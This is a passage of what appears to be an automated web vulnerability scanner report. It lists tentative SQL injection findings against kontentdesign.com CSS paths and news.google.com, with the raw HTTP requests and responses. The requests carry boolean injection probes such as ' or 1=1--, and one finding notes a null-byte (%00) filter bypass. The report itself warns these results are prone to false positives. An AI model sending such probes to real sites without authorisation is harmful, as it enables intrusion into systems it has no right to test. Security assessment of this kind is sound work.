GET /templates/kontent11/css/reset.css13324620'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:06:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 570

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/reset.css13324620' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/reset.css13324620'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 566

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/reset.css13324620' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.29. http://kontentdesign.com/templates/kontent11/css/reset.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/reset.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 15058242%20or%201%3d1--%20 and 15058242%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/reset.css?115058242%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:08:21 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 551

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/reset.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/reset.css?115058242%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:08:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:08:32 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 2771

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */

/*
* reset
*/

body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td {
   margin: 0;
   padding: 0;
}

fieldset, img { border: 0; }

a:focus { outline: none; }

body { overflow-y: scroll; }

/*
* default values
*/

p {
   margin-top: 10px;
   margin-bottom: 15px;
}

ul, ol, dl {
   margin: 10px 0;
   padding-left: 30px
}

dl { margin: 10px 0; }
dd { padding-left: 40px; }

td, th { padding: 1px; }

a:link, a:visited { text-decoration: none; }
a:hover { text-decoration: underline; }

fieldset {
   margin: 10px 0 10px 0;
   padding: 0 10px 10px 10px;
   border: 1px solid #c8c8c8;
}

legend {
   padding: 0 10px 0 10px;
   background: #ffffff;
}

form div { margin: 10px 0 10px 0; }

textarea { padding: 1px 0 1px 5px; }

option { padding: 0 0 1px 5px; }

input[type='hidden'] { display: none; }

input[type='text'],
input[type='password'] { padding: 1px 0 1px 5px; }

button,
input[type='button'],
input[type='submit'] {
   padding: 2px 4px 2px 1px;
   line-height: 100%;
}

input[type='button'],
input[type='submit'],
input[type='checkbox'],
input[type='image'],
input[type='radio'],
input[type='reset'],
select,
button { cursor: pointer; }

textarea,
input[type='text'],
input[type='password'],
select {
   border: 1px solid #c8c8c8;
   background: #ffffff;
}

textarea:hover,
input[type='text']:hover,
input[type='password']:hover,
select:hover { border-color: #aaaaaa; }

textarea:focus,
input[type='text']:focus,
input[type='password'
...[SNIP]...

1.30. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19643837'%20or%201%3d1--%20 and 19643837'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates19643837'%20or%201%3d1--%20/kontent11/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:02:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates19643837' or 1=1-- /kontent11/css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates19643837'%20or%201%3d2--%20/kontent11/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:02:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates19643837' or 1=2-- /kontent11/css/typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.31. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 16071338'%20or%201%3d1--%20 and 16071338'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent1116071338'%20or%201%3d1--%20/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:03:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent1116071338' or 1=1-- /css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent1116071338'%20or%201%3d2--%20/css/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:04:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent1116071338' or 1=2-- /css/typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.32. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 15857804'%20or%201%3d1--%20 and 15857804'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css15857804'%20or%201%3d1--%20/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:05:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css15857804' or 1=1-- /typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css15857804'%20or%201%3d2--%20/typography.css HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:05:49 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css15857804' or 1=2-- /typography.css was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.33. http://kontentdesign.com/templates/kontent11/css/typography.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/typography.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 51594661'%20or%201%3d1--%20 and 51594661'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/typography.css51594661'%20or%201%3d1--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 04:07:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 575

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/typography.css51594661' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/typography.css51594661'%20or%201%3d2--%20 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 04:07:46 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 571

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /templates/kontent11/css/typography.css51594661' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

1.34. http://kontentdesign.com/templates/kontent11/css/typography.css [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://kontentdesign.com
Path:	/templates/kontent11/css/typography.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 19760934%20or%201%3d1--%20 and 19760934%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /templates/kontent11/css/typography.css?119760934%20or%201%3d1--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 25 Jan 2011 03:09:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 556

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /templates/kontent11/css/typography.css
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5 Server at kontentdesign.com Port 80</address>
</body></html>

Request 2

GET /templates/kontent11/css/typography.css?119760934%20or%201%3d2--%20=1 HTTP/1.1
Host: kontentdesign.com
Proxy-Connection: keep-alive
Referer: http://kontentdesign.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 352408000473833862436b9fb7dcdeb1=7afb14bc02eda1d7b0301fa03d45c97d

Response 2

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:09:06 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
Last-Modified: Thu, 13 Jan 2011 07:46:42 GMT
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Expires: Tue, 08 Feb 2011 03:09:06 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 5015

/* Copyright (C) 2007 - 2011 YOOtheme GmbH, YOOtheme Proprietary Use License (http://www.yootheme.com/license) */

/*
* headings
*/

h1, h2, h3, h4, h5, h6 { font-family: Arial, Helvetica, sans-serif; }

h1 {
   font-weight: normal;
   color: #c8001e;
}

#page h1 a {
   color: #c8001e;
   text-decoration: none;
}

h2 { color: #50555A; }
h3 { color: #c8001e; }
h4 { color: #50555A; }
h5 { color: #c8001e; }
h6 { color: #50555A; }

/*
* anchor
*/

a:link,
a:visited { color: #C8001E; }
a:hover { color: #ff0000; }

a.icon-folder {
padding-left: 17px;
background: url(../images/typography/icon_folder.png) 0 40% no-repeat;
}

a.icon-file {
padding-left: 17px;
background: url(../images/typography/icon_file.png) 0 40% no-repeat;
}

a.icon-download {
padding-left: 17px;
background: url(../images/typography/icon_download.png) 0 40% no-repeat;
}

a.icon-external {
padding-left: 17px;
background: url(../images/typography/icon_external.png) 0 40% no-repeat;
}

a.icon-pdf {
padding-left: 17px;
background: url(../images/pdf_button.png) 0 40% no-repeat;
}

/*
* emphasis
*/

em.box {
   padding: 0px 3px 0px 3px;
   border: 1px dotted #aaaaaa;
   background: #f5f6f7;
   font-family: "Courier New", Courier, monospace;
   font-style: normal;
}

/*
* unsorted lists
*/

ul.arrow,
ul.checkbox,
ul.check,
ul.star {
   margin: 10px 0px 10px 0px;
   padding-left: 20px;
   list-style: none;
}

ul.arrow li,
ul.checkbox li,
ul.check li,
ul.star li {
   margin: 5px 0px 5px 0px;
   padding-left: 35px;
   font-weight: bold;
   line-height: 26px;
}

...[SNIP]...

1.35. http://news.google.com/news/story [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://news.google.com
Path:	/news/story

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

